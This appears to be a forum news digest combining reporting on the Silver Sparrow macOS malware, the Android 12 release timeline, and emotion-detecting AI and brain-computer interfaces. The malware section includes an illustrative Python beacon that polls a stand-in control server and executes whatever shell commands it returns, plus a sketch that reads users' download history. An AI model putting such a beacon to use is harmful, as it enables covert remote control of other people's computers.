
A previously undetected piece of malware found on almost 30,000 Macs worldwide is generating intrigue in security circles, and researchers are still trying to understand precisely what it does and what purpose its self-destruct capability serves. Once an hour, infected Macs check a control server to see if there are any new commands the malware should run or binaries to execute. So far, however, researchers have yet to observe the delivery of a payload on any of the roughly 30,000 infected machines, leaving the malware’s ultimate goal unknown. The lack of a final payload suggests that the malware may spring into action only once an unknown condition is met.

Also curious: the malware comes with a mechanism to completely remove itself, a capability typically reserved for high-stealth operations. So far, though, there are no signs the self-destruct feature has been used, raising the question of why the mechanism exists.

Beyond those questions, the malware is notable for having a version that runs natively on the M1 chip that Apple introduced in November, making it only the second known piece of macOS malware to do so. The malicious binary is more mysterious still because it uses the macOS Installer JavaScript API to execute commands. That makes it hard to analyze installation package contents or the way the package uses the JavaScript commands. The malware has been found in 153 countries, with detections concentrated in the US, UK, Canada, France, and Germany. Its use of Amazon Web Services and the Akamai content delivery network ensures the command infrastructure works reliably and also makes blocking the servers harder. Researchers from Red Canary, the security firm that discovered the malware, are calling it Silver Sparrow.

“Though we haven’t observed Silver Sparrow delivering additional malicious payloads yet, its forward-looking M1 chip compatibility, global reach, relatively high infection rate, and operational maturity suggest Silver Sparrow is a reasonably serious threat, uniquely positioned to deliver a potentially impactful payload at a moment’s notice,” Red Canary researchers wrote in a blog post published on Friday. “Given these causes for concern, in the spirit of transparency, we wanted to share everything we know with the broader infosec industry sooner rather than later.”

Silver Sparrow comes in two versions: one with a binary in mach-object (Mach-O) format compiled for Intel x86_64 processors, the other with a Mach-O binary compiled for the M1. So far, researchers haven’t seen either binary do much of anything, prompting them to refer to the files as “bystander binaries.” Curiously, when executed, the x86_64 binary displays the words “Hello World!” while the M1 binary reads “You did it!” The researchers suspect the files are placeholders, giving the installer something to distribute while the real activity happens through the JavaScript execution. Apple has revoked the developer certificate for both bystander binaries.

Silver Sparrow is only the second piece of malware to contain code that runs natively on Apple’s new M1 chip; an adware sample reported earlier this week was the first. Native M1 code runs with greater speed and reliability on the new platform than x86_64 code does because it doesn’t have to be translated before being executed. Many developers of legitimate macOS apps still haven’t finished recompiling their code for the M1, so Silver Sparrow’s M1 version suggests its developers are ahead of the curve.
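The hourly check-in described above is a classic beacon loop: poll a control server, run whatever comes back, and optionally remove yourself. Red Canary’s post does not include the agent’s actual code, so the following Python sketch is purely illustrative: the endpoint and JSON field names are invented, and the real malware’s infrastructure sat behind AWS and Akamai rather than a single host.

```python
import json
import subprocess
import time
import urllib.request

# Hypothetical control endpoint; the real infrastructure reportedly sat
# behind AWS S3 and the Akamai CDN, not a single host like this one.
CONTROL_URL = "https://c2.example.invalid/tasks.json"
CHECK_INTERVAL = 60 * 60  # the article describes an hourly check-in

def self_destruct() -> None:
    # Placeholder for the kill switch: a real implementation would remove
    # the agent's persistence entry and delete its files before exiting.
    raise SystemExit

while True:
    try:
        with urllib.request.urlopen(CONTROL_URL, timeout=30) as resp:
            task = json.load(resp)
        if task.get("remove_self"):      # invented field name
            self_destruct()
        if task.get("command"):          # run whatever the operator sent
            subprocess.run(task["command"], shell=True)
    except Exception:
        pass  # fail silently and try again on the next cycle
    time.sleep(CHECK_INTERVAL)
```

The point of the sketch is the shape of the logic, not the specifics: an agent like this stays inert until the server says otherwise, which is consistent with researchers seeing no payload despite roughly 30,000 machines checking in every hour.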
Once installed, Silver Sparrow searches for the URL the installer package was downloaded from, most likely so the malware operators will know which distribution channels are most successful. In that regard, Silver Sparrow resembles previously seen macOS adware. It remains unclear precisely how or where the malware is being distributed or how it gets installed. The URL check, though, suggests that malicious search results may be at least one distribution channel, in which case the installers would likely pose as legitimate apps. For more, turn to OUR FORUM.
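One technical footnote to the URL check above: the article doesn’t say how the lookup works. A plausible mechanism on macOS (an assumption on our part, not a detail from the report) is to read the per-user LSQuarantine database, where the OS records the origin URL of every quarantined download. A minimal sketch:

```python
import sqlite3
from pathlib import Path

# macOS records download provenance per user in the quarantine database.
DB = Path.home() / "Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2"

con = sqlite3.connect(str(DB))
row = con.execute(
    "SELECT LSQuarantineDataURLString FROM LSQuarantineEvent "
    "ORDER BY LSQuarantineTimeStamp DESC LIMIT 1"
).fetchone()
con.close()

print("most recent download URL:", row[0] if row else "none recorded")
```

Because any process running as the logged-in user can read this database, a download URL is recoverable long after the installer has run.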

Android is the world’s most popular smartphone operating system, running on billions of smartphones around the world. As a result, even the tiniest of changes in the OS has the potential to affect millions of users. But because of the way Android updates are delivered, it’s debatable whether these changes actually reach most of those users. Despite that, we’re always looking forward to the next big Android update in hopes that it brings significant change. Speaking of which, the first developer preview for the next major update, Android 12, is right around the corner, and it could bring many improvements. In case you missed our previous coverage, here’s everything we know about Android 12 so far.

Android 12 will first make an appearance as Developer Preview releases. We expect to get a couple of these, with the first one hopefully landing on Wednesday, 17th February 2021. The Developer Preview for Android 11 began in February 2020, a few weeks ahead of the usual release in March, which gave developers more time to adapt their apps to the new platform behaviors and APIs introduced in the update. Since the COVID-19 pandemic hasn’t completely blown over in several parts of the world, we expect Google to follow a longer timeline this year as well.

As their name implies, the Android 12 Developer Previews will allow developers to begin platform migration and start the adaptation process for their apps. Google is expected to detail most of the major platform changes in the previews to inform the entire Android ecosystem of what’s coming. Developer Previews are largely unstable, and they are not intended for average users. Google also reserves the right to add or remove features at this stage, so do not be surprised if a feature present in the first Developer Preview goes missing in the following releases. Developer Previews are also restricted to supported Google Pixel devices, though you can try them out on other phones by sideloading a GSI (a rough sketch of that flow appears below).

After a couple of Developer Preview releases, we will make our way to the Android 12 Beta releases, with the first one expected in either May or June this year. These releases will be a bit more polished, and they will give us a fair idea of what the final OS release will look like. There may also be minor releases in between Betas, mainly to fix critical bugs. Around this time, we will also start seeing releases for devices outside of the supported Google Pixel lineup. OEMs will begin migrating their UX skins to the Beta version of Android 12 and start recruiting for their own “Preview” programs. However, these releases may lag a version behind the ones available on the Google Pixel. Again, bugs are to be expected in these preview programs, and as such, they are recommended only for developers and advanced users.

After a beta release or two, the releases will reach Platform Stability, a milestone that co-exists with the Beta status and is expected around July-August this year. Platform Stability means that the Android 12 SDK, NDK APIs, app-facing surfaces, platform behaviors, and even the restrictions on non-SDK interfaces have been finalized. There will be no further changes in how Android 12 behaves or how its APIs function in the betas that follow. At this point, developers can start updating their apps to target Android 12 (API Level 31) without being concerned about unexpected changes breaking their app behavior.
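For reference, the GSI sideload mentioned above usually boils down to a handful of adb/fastboot commands. The Python sketch below simply wraps those commands; it assumes an unlocked bootloader, a device with dynamic partitions, and an already-downloaded GSI system image. Some devices also require flashing a vbmeta image with verification disabled first, so treat this as the general shape of the flow rather than exact instructions for your phone:

```python
import subprocess

GSI_IMAGE = "system.img"  # hypothetical path to the downloaded Android 12 GSI

def run(*cmd: str) -> None:
    """Echo and execute a command, stopping on the first failure."""
    print("+", " ".join(cmd))
    subprocess.run(cmd, check=True)

run("adb", "reboot", "bootloader")             # drop into the bootloader
run("fastboot", "reboot", "fastboot")          # enter userspace fastboot (fastbootd)
run("fastboot", "flash", "system", GSI_IMAGE)  # write the GSI over the system partition
run("fastboot", "-w")                          # wipe userdata; needed after replacing system
run("fastboot", "reboot")
```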
After one or two beta releases carrying the Platform Stability tag, we can expect Google to roll out the first Android 12 stable release. This is expected to happen in late August or September. As usual, Google’s Pixel devices are expected to be the first to get the Android 12 stable release. For non-Pixel phones, we expect to see wider public betas at this stage. The exact timeline will depend on your phone and its OEM’s plans. A good rule of thumb is that flagships will be prioritized for the update, so if you have a phone lower down the price range, you can expect to receive the update a few weeks or months down the line. The complete two-part report is posted on OUR FORUM.

Our thoughts are private – or at least they were. New breakthroughs in neuroscience and artificial intelligence are changing that assumption, while at the same time inviting new questions around ethics, privacy, and the horizons of brain/computer interaction.

Research published last week from Queen Mary University in London describes an application of a deep neural network that can determine a person’s emotional state by analyzing wireless signals used like radar. In the study, participants watched a video while radio signals were sent toward them and measured as they bounced back. Analysis of body movements revealed “hidden” information about an individual’s heart and breathing rates. From these physiological signals, the algorithm can determine one of four basic emotion types: anger, sadness, joy, and pleasure (a toy sketch of that pipeline appears below). The researchers proposed this work could help with the management of health and wellbeing and be used to perform tasks like detecting depressive states.

Ahsan Noor Khan, a Ph.D. student and first author of the study, said: “We’re now looking to investigate how we could use low-cost existing systems, such as Wi-Fi routers, to detect emotions of a large number of people gathered, for instance in an office or work environment.” Among other things, this could be useful for HR departments to assess how new policies introduced in a meeting are being received, regardless of what the recipients might say. Outside of an office, police could use this technology to look for emotional changes in a crowd that might lead to violence.

The research team plans to examine the public acceptance and ethical concerns around the use of this technology. Such concerns would not be surprising and conjure up a very Orwellian idea of the ‘thought police’ from 1984. In that novel, the thought police watchers are experts at reading people’s faces to ferret out beliefs unsanctioned by the state, though they never mastered learning exactly what a person was thinking.

This is not the only thought technology on the horizon with dystopian potential. In “Crocodile,” an episode of Netflix’s series Black Mirror, the show portrayed a memory-reading technique used to investigate accidents for insurance purposes. The “corroborator” device used a square node placed on a victim’s temple, then displayed their memories of an event on the screen. The investigator says the memories “may not be totally accurate, and they’re often emotional. But by collecting a range of recollections from yourself and any witnesses, we can help build a corroborative picture.”

If this seems farfetched, consider that researchers at Kyoto University in Japan developed a method to “see” inside people’s minds using an fMRI scanner, which detects changes in blood flow in the brain. Using a neural network, they correlated these changes with images shown to the individuals and projected the results onto a screen. Though far from polished, the output was essentially a reconstruction of what the subjects were thinking about. One prediction estimates this technology could be in use by the 2040s.
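To make the Queen Mary pipeline concrete: reflections come in, physiological features (heart and breathing rates) come out, and a classifier maps those features to one of the four emotions. The study used a deep neural network; the toy Python sketch below substitutes a nearest-centroid classifier, and every number in it is invented purely for illustration:

```python
import math

# Invented centroids in (heart rate bpm, breaths per minute) space.
# The real model is a deep neural network trained on radar data, not this.
CENTROIDS = {
    "anger":    (95.0, 20.0),
    "sadness":  (65.0, 12.0),
    "joy":      (85.0, 16.0),
    "pleasure": (72.0, 14.0),
}

def classify(heart_rate: float, breathing_rate: float) -> str:
    """Return the emotion whose centroid is nearest the measured features."""
    return min(
        CENTROIDS,
        key=lambda label: math.dist((heart_rate, breathing_rate), CENTROIDS[label]),
    )

print(classify(heart_rate=86.0, breathing_rate=16.5))  # -> "joy" with these toy numbers
```

The unsettling part is not the classifier but the input: the features are recovered passively, from radio reflections, without any sensor on the body.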
Brain-computer interfaces (BCIs) are also making steady progress on several fronts. In 2016, research at Arizona State University showed a student wearing what looks like a swim cap containing nearly 130 sensors connected to a computer to detect the student’s brain waves, letting him control the flight of three drones with his mind. The device lets him move the drones simply by thinking directional commands: up, down, left, right.

Image: Flying drones with your brain in 2019 (source: University of Southern Florida).

Advance a few years to 2019 and the headgear is far more streamlined. Now there are brain-drone races. Besides the flight examples, BCIs are being developed for medical applications. MIT researchers have developed a computer interface that can transcribe words that the user verbalizes internally but does not actually speak aloud. Visit OUR FORUM for more.